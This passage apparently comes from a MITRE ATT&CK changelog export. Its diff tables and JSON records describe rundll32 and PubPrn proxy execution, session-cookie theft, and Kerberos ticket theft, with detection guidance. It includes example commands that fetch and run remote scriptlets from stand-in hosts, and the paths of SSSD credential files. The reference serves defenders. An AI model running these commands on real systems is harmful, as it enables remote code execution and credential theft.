| t | 1 | Adversaries may abuse rundll32.exe to proxy execution of mal | t | 1 | Adversaries may abuse rundll32.exe to proxy execution of mal |
| > | icious code. Using rundll32.exe, vice executing directly (i. | > | icious code. Using rundll32.exe, vice executing directly (i. | ||
| > | e. [Shared Modules](https://attack.mitre.org/techniques/T112 | > | e. [Shared Modules](https://attack.mitre.org/techniques/T112 | ||
| > | 9)), may avoid triggering security tools that may not monito | > | 9)), may avoid triggering security tools that may not monito | ||
| > | r execution of the rundll32.exe process because of allowlist | > | r execution of the rundll32.exe process because of allowlist | ||
| > | s or false positives from normal operations. Rundll32.exe is | > | s or false positives from normal operations. Rundll32.exe is | ||
| > | commonly associated with executing DLL payloads. Rundll32. | > | commonly associated with executing DLL payloads (ex: <code> | ||
| > | exe can also be used to execute [Control Panel](https://atta | > | rundll32.exe {DLLname, DLLfunction}</code>). Rundll32.exe c | ||
| > | ck.mitre.org/techniques/T1218/002) Item files (.cpl) through | > | an also be used to execute [Control Panel](https://attack.mi | ||
| > | the undocumented shell32.dll functions <code>Control_RunDLL | > | tre.org/techniques/T1218/002) Item files (.cpl) through the | ||
| > | </code> and <code>Control_RunDLLAsUser</code>. Double-clicki | > | undocumented shell32.dll functions <code>Control_RunDLL</cod | ||
| > | ng a .cpl file also causes rundll32.exe to execute. (Citatio | > | e> and <code>Control_RunDLLAsUser</code>. Double-clicking a | ||
| > | n: Trend Micro CPL) Rundll32 can also be used to execute sc | > | .cpl file also causes rundll32.exe to execute. (Citation: Tr | ||
| > | ripts such as JavaScript. This can be done using a syntax si | > | end Micro CPL) Rundll32 can also be used to execute scripts | ||
| > | milar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,Run | > | such as JavaScript. This can be done using a syntax similar | ||
| > | HTMLApplication \";document.write();GetObject(\"script:https[: | > | to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLA | ||
| > | ]//www[.]example[.]com/malicious.sct\")\"</code> This behavio | > | pplication \";document.write();GetObject(\"script:https[:]//ww | ||
| > | r has been seen used by malware such as Poweliks. (Citation: | > | w[.]example[.]com/malicious.sct\")\"</code> This behavior has | ||
| > | This is Security Command Line Confusion) | > | been seen used by malware such as Poweliks. (Citation: This | ||
| > | is Security Command Line Confusion) Adversaries may also a | ||||
| > | ttempt to obscure malicious code from analysis by abusing th | ||||
| > | e manner in which rundll32.exe loads DLL function names. As | ||||
| > | part of Windows compatibility support for various character | ||||
| > | sets, rundll32.exe will first check for wide/Unicode then AN | ||||
| > | SI character-supported functions before loading the specifie | ||||
| > | d function (e.g., given the command <code>rundll32.exe Examp | ||||
| > | leDLL.dll, ExampleFunction</code>, rundll32.exe would first | ||||
| > | attempt to execute <code>ExampleFunctionW</code>, or failing | ||||
| > | that <code>ExampleFunctionA</code>, before loading <code>Ex | ||||
| > | ampleFunction</code>). Adversaries may therefore obscure mal | ||||
| > | icious code by creating multiple identical exported function | ||||
| > | names and appending <code>W</code> and/or <code>A</code> to | ||||
| > | harmless ones.(Citation: Attackify Rundll32.exe Obscurity)( | ||||
| > | Citation: Github NoRunDll) |
Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1216/001",
"external_id": "T1216.001"
},
{
"source_name": "pubprn",
"description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn"
},
{
"source_name": "Enigma0x3 PubPrn Bypass",
"description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.",
"url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Atul Nair, Qualys"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Script: Script Execution"
],
"x_mitre_defense_bypassed": [
"Digital Certificate Validation",
"Application Control"
],
"x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Atul Nair, Qualys\"], \"root['x_mitre_defense_bypassed']\": [\"Digital Certificate Validation\", \"Application Control\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-01 00:57:01.161000+00:00\", \"old_value\": \"2020-06-08 23:36:30.648000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\\n\\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\\n\\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).\", \"old_value\": \"Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.\\n\\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.\\n+Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\\n \\n-PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.\\n+Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\\n+\\n+In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).\"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"pubprn\", \"old_value\": \"Enigma0x3 PubPrn Bypass\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.\", \"old_value\": \"Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn\", \"old_value\": \"https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"Enigma0x3 PubPrn Bypass\", \"description\": \"Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.\", \"url\": \"https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use the trusted PubPrn script to proxy execu | t | 1 | Adversaries may use PubPrn to proxy execution of malicious r |
| > | tion of malicious files. This behavior may bypass signature | > | emote files. PubPrn.vbs is a [Visual Basic](https://attack.m | ||
| > | validation restrictions and application control solutions th | > | itre.org/techniques/T1059/005) script that publishes a print | ||
| > | at do not account for use of these scripts. <code>PubPrn.vb | > | er to Active Directory Domain Services. The script is signed | ||
| > | s</code> is a Visual Basic script that publishes a printer t | > | by Microsoft and is commonly executed through the [Windows | ||
| > | o Active Directory Domain Services. The script is signed by | > | Command Shell](https://attack.mitre.org/techniques/T1059/003 | ||
| > | Microsoft and can be used to proxy execution from a remote s | > | ) via <code>Cscript.exe</code>. For example, the following c | ||
| > | ite.(Citation: Enigma0x3 PubPrn Bypass) An example command i | > | ode publishes a printer within the specified domain: <code>c | ||
| > | s <code>cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts | > | script pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Co | ||
| > | \\en-US\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/ | > | m</code>.(Citation: pubprn) Adversaries may abuse PubPrn to | ||
| > | hi.png</code>. | > | execute malicious payloads hosted on remote sites.(Citation | ||
| > | : Enigma0x3 PubPrn Bypass) To do so, adversaries may set the | ||||
| > | second <code>script:</code> parameter to reference a script | ||||
| > | let file (.sct) hosted on a remote site. An example command | ||||
| > | is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/fo | ||||
| > | lder/file.sct</code>. This behavior may bypass signature val | ||||
| > | idation restrictions and application control solutions that | ||||
| > | do not account for abuse of this script. In later versions | ||||
| > | of Windows (10+), <code>PubPrn.vbs</code> has been updated t | ||||
| > | o prevent proxying execution from a remote site. This is don | ||||
| > | e by limiting the protocol specified in the second parameter | ||||
| > | to <code>LDAP://</code>, vice the <code>script:</code> moni | ||||
| > | ker which could be used to reference remote code via HTTP(S) | ||||
| > | . |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | An adversary may steal web application or service session co | t | 1 | An adversary may steal web application or service session co |
| > | okies and use them to gain access to web applications or Int | > | okies and use them to gain access to web applications or Int | ||
| > | ernet services as an authenticated user without needing cred | > | ernet services as an authenticated user without needing cred | ||
| > | entials. Web applications and services often use session coo | > | entials. Web applications and services often use session coo | ||
| > | kies as an authentication token after a user has authenticat | > | kies as an authentication token after a user has authenticat | ||
| > | ed to a website. Cookies are often valid for an extended pe | > | ed to a website. Cookies are often valid for an extended pe | ||
| > | riod of time, even if the web application is not actively us | > | riod of time, even if the web application is not actively us | ||
| > | ed. Cookies can be found on disk, in the process memory of t | > | ed. Cookies can be found on disk, in the process memory of t | ||
| > | he browser, and in network traffic to remote systems. Additi | > | he browser, and in network traffic to remote systems. Additi | ||
| > | onally, other applications on the targets machine might stor | > | onally, other applications on the targets machine might stor | ||
| > | e sensitive authentication cookies in memory (e.g. apps whic | > | e sensitive authentication cookies in memory (e.g. apps whic | ||
| > | h authenticate to cloud services). Session cookies can be us | > | h authenticate to cloud services). Session cookies can be us | ||
| > | ed to bypasses some multi-factor authentication protocols.(C | > | ed to bypasses some multi-factor authentication protocols.(C | ||
| > | itation: Pass The Cookie) There are several examples of mal | > | itation: Pass The Cookie) There are several examples of mal | ||
| > | ware targeting cookies from web browsers on the local system | > | ware targeting cookies from web browsers on the local system | ||
| > | .(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 | > | .(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 | ||
| > | Mac Crypto Cookies January 2019) There are also open source | > | Mac Crypto Cookies January 2019) There are also open source | ||
| > | frameworks such as Evilginx 2 and Muraena that can gather s | > | frameworks such as Evilginx 2 and Muraena that can gather s | ||
| > | ession cookies through a man-in-the-middle proxy that can be | > | ession cookies through a malicious proxy (ex: [Adversary-in- | ||
| > | set up by an adversary and used in phishing campaigns.(Cita | > | the-Middle](https://attack.mitre.org/techniques/T1557)) that | ||
| > | tion: Github evilginx2)(Citation: GitHub Mauraena) After an | > | can be set up by an adversary and used in phishing campaign | ||
| > | adversary acquires a valid cookie, they can then perform a | > | s.(Citation: Github evilginx2)(Citation: GitHub Mauraena) A | ||
| > | [Web Session Cookie](https://attack.mitre.org/techniques/T15 | > | fter an adversary acquires a valid cookie, they can then per | ||
| > | 50/004) technique to login to the corresponding web applicat | > | form a [Web Session Cookie](https://attack.mitre.org/techniq | ||
| > | ion. | > | ues/T1550/004) technique to login to the corresponding web a | ||
| > | pplication. |
klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1558",
"external_id": "T1558"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/652.html",
"external_id": "CAPEC-652"
},
{
"source_name": "ADSecurity Kerberos Ring Decoder",
"description": "Sean Metcalf. (2014, September 12). Kerberos, Active Directory\u2019s Secret Decoder Ring. Retrieved February 27, 2020.",
"url": "https://adsecurity.org/?p=227"
},
{
"source_name": "Microsoft Klist",
"description": "Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.",
"url": "https://docs.microsoft.com/windows-server/administration/windows-commands/klist"
},
{
"source_name": "MIT ccache",
"description": "Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.",
"url": "https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html"
},
{
"source_name": "Linux Kerberos Tickets",
"description": "Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html"
},
{
"source_name": "Brining MimiKatz to Unix",
"description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.",
"url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf"
},
{
"source_name": "Kekeo",
"description": "Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.",
"url": "https://github.com/gentilkiwi/kekeo"
},
{
"source_name": "SpectorOps Bifrost Kerberos macOS 2019",
"description": "Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.",
"url": "https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f"
},
{
"source_name": "macOS kerberos framework MIT",
"description": "Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.",
"url": "http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html"
},
{
"source_name": "ADSecurity Detecting Forged Tickets",
"description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.",
"url": "https://adsecurity.org/?p=1515"
},
{
"source_name": "Stealthbits Detect PtT 2019",
"description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.",
"url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks"
},
{
"source_name": "CERT-EU Golden Ticket Protection",
"description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.",
"url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"
},
{
"source_name": "Microsoft Kerberos Golden Ticket",
"description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.",
"url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285"
},
{
"source_name": "Microsoft Detecting Kerberoasting Feb 2018",
"description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.",
"url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"
},
{
"source_name": "AdSecurity Cracking Kerberos Dec 2015",
"description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.",
"url": "https://adsecurity.org/?p=2293"
},
{
"source_name": "Medium Detecting Attempts to Steal Passwords from Memory",
"description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.",
"url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Tim (Wadhwa-)Brown",
"Cody Thomas, SpecterOps"
],
"x_mitre_data_sources": [
"File: File Access",
"Command: Command Execution",
"Active Directory: Active Directory Credential Request",
"Logon Session: Logon Session Metadata"
],
"x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\n\nMonitor for unusual processes accessing\u00a0secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"root"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
"x_mitre_system_requirements": [
"Kerberos authentication enabled"
],
"x_mitre_version": "1.3",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Tim (Wadhwa-)Brown\", \"Cody Thomas, SpecterOps\"], \"root['x_mitre_permissions_required']\": [\"User\", \"root\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 22:56:22.054000+00:00\", \"old_value\": \"2020-11-05 16:07:04.189000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \\u201crealms\\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\\n\\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\\n\\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \\\"ccache\\\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\\n\\n\\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\\n\", \"old_value\": \"Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). \\n\\nKerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \\u201crealms\\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,8 @@\\n-Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). \\n+Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \\u201crealms\\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\\n \\n-Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \\u201crealms\\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\\n+On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\\n+\\n+Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \\\"ccache\\\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\\n+\\n+\\n+Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"Microsoft Klist\", \"old_value\": \"ADSecurity Detecting Forged Tickets\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.\", \"old_value\": \"Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://docs.microsoft.com/windows-server/administration/windows-commands/klist\", \"old_value\": \"https://adsecurity.org/?p=1515\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"MIT ccache\", \"old_value\": \"Stealthbits Detect PtT 2019\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.\", \"old_value\": \"Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html\", \"old_value\": \"https://blog.stealthbits.com/detect-pass-the-ticket-attacks\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"Linux Kerberos Tickets\", \"old_value\": \"CERT-EU Golden Ticket Protection\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.\", \"old_value\": \"Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html\", \"old_value\": \"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf\"}, \"root['external_references'][6]['source_name']\": {\"new_value\": \"Brining MimiKatz to Unix\", \"old_value\": \"Microsoft Kerberos Golden Ticket\"}, \"root['external_references'][6]['description']\": {\"new_value\": \"Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 